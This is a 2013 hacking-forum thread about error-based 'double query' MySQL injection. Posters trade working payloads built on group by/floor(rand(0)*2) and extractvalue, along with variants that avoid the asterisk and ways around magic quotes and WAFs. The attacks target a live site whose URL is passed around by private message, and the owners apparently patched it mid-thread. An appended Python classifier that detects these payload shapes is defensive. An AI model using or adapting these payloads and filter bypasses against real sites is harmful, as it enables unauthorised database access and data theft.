How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
double query sql injection, need very small help
Posted by: jammy99
Date: May 24, 2013 02:28AM

I can successfully execute this query on one of my hosts for pen testing...

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

Is there a way to use something else in place of

rand(0)*2

Actually I cannot use * in my SQL injection for some reason. So I just thought to ask you guys if there is a way to avoid * in the above query.

Re: double query sql injection, need very small help
Posted by: infinity
Date: May 24, 2013 08:31AM

Hi jammy99,

Instead of using the multiplication by 2 in

rand(0)*2

you can try to divide by 1/2 or 0.5:

rand(0)/(1/2)

rand(0)/0.5

This avoids the asterisk (*) and the result is the same, at least that is the case on my system :)



Edited 1 time(s). Last edit at 05/24/2013 08:32AM by infinity.

Re: double query sql injection, need very small help
Posted by: jammy99
Date: May 24, 2013 10:01AM

Hi infinity,
thank you very much for your reply :-)

My bad luck :-(

They just turned on magic quotes :-(

My double query injection was running like

hi' or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

but now it goes like \' so I cannot inject it anymore :-( Or is there any other way to bypass the single quote in such a problem?


However, I have one more point where I can run blind SQL injection. So I was thinking that my double query would work there. But I had hard luck, it's not working there. But as far as I can tell it must work there, because it should go like

21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)/0.5)) having min(0) or 1--

21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)/(1/2))) having min(0) or 1--


:-( What can I do?



Edited 1 time(s). Last edit at 05/24/2013 10:02AM by jammy99.

Re: double query sql injection, need very small help
Posted by: jammy99
Date: May 25, 2013 01:36AM

Or can I share the site URL with anyone in PM?

Re: double query sql injection, need very small help
Posted by: ajkaro
Date: May 27, 2013 04:53AM

Send me the URL to PM. I will check it out...

Re: double query sql injection, need very small help
Posted by: jammy99
Date: May 27, 2013 01:38PM

PM sent

Re: double query sql injection, need very small help
Posted by: hack2012
Date: June 02, 2013 02:01AM

I want to try, can you send it to me???

Re: double query sql injection, need very small help
Posted by: jammy99
Date: June 02, 2013 10:42PM

PM sent

Re: double query sql injection, need very small help
Posted by: hack2012
Date: June 04, 2013 02:46AM

and extractvalue(1, concat(0x7e, (select @@version),0x7e))

and extractvalue(1, concat(0x7e, (select user()),0x7e))

For more WAF bypasses, please visit my blog:

http://www.waitalone.cn/tag/bypass

I am from China!



Edited 2 time(s). Last edit at 06/04/2013 03:07AM by hack2012.

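Added example, not code from this thread or any of its posters: a small Python classifier run over constructed sample parameter values modelled on the payload shapes quoted above. It shows that a detection rule keyed on the function names (floor/rand inside group by ... having, extractvalue with concat) catches the *2, /0.5 and /(1/2) variants alike, even when URL-encoded, and that the numeric variants contain no quote for magic-quotes escaping to act on. The signature names and sample values are my own assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Signatures for the error-based ("double query") MySQL injection shapes quoted in
# this thread. They key on the function names, not on the arithmetic operator, so
# rand(0)*2, rand(0)/0.5 and rand(0)/(1/2) all hit the same rule. Names are mine.
SIGNATURES = {
    "group_by_rand_floor": re.compile(
        r"group\s+by\b.*\bfloor\s*\(\s*rand\s*\(.*\bhaving\b", re.I | re.S),
    "extractvalue_xpath_error": re.compile(
        r"\bextractvalue\s*\(.*\bconcat\s*\(", re.I | re.S),
}

def normalise(value: str) -> str:
    """Decode URL encoding (twice, for double-encoded input) and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded)

def classify(param_value: str) -> List[str]:
    """Return the names of all signatures the decoded parameter value matches."""
    text = normalise(param_value)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

# Constructed sample request values (not real traffic), based on the payloads in the
# thread. The numeric variants carry no quote at all, so magic_quotes-style escaping
# never touches them; only parameterised queries take the value out of the grammar.
SAMPLES = {
    "benign": "21",
    "star": "21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--",
    "divide": "21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)/0.5)) having min(0) or 1--",
    "divide_paren": "21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)/(1/2))) having min(0) or 1--",
    "urlencoded": "21+or+1+group+by+concat_ws%280x3a%2Cversion%28%29%2Cfloor%28rand%280%29%2F0.5%29%29+having+min%280%29+or+1--",
    "extractvalue": "1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))",
}

def scan_samples() -> Dict[str, List[str]]:
    """Classify every constructed sample; an empty list means no signature matched."""
    return {label: classify(value) for label, value in SAMPLES.items()}

if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(f"{label:13s} -> {hits or ['clean']}")
```

A filter that only strips the asterisk or escapes quotes leaves every one of these samples intact; the classifier flags all five injection shapes and only the plain numeric value as clean.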
Re: double query sql injection, need very small help
Posted by: jammy99
Date: June 04, 2013 02:58AM

I already have this solution. It was already provided by ajkaro.

I hope you could find another way with double query only.

btw, please check PM

Re: double query sql injection, need very small help
Posted by: jammy99
Date: June 04, 2013 03:06AM

Thank you very much



Edited 1 time(s). Last edit at 06/04/2013 03:12AM by jammy99.
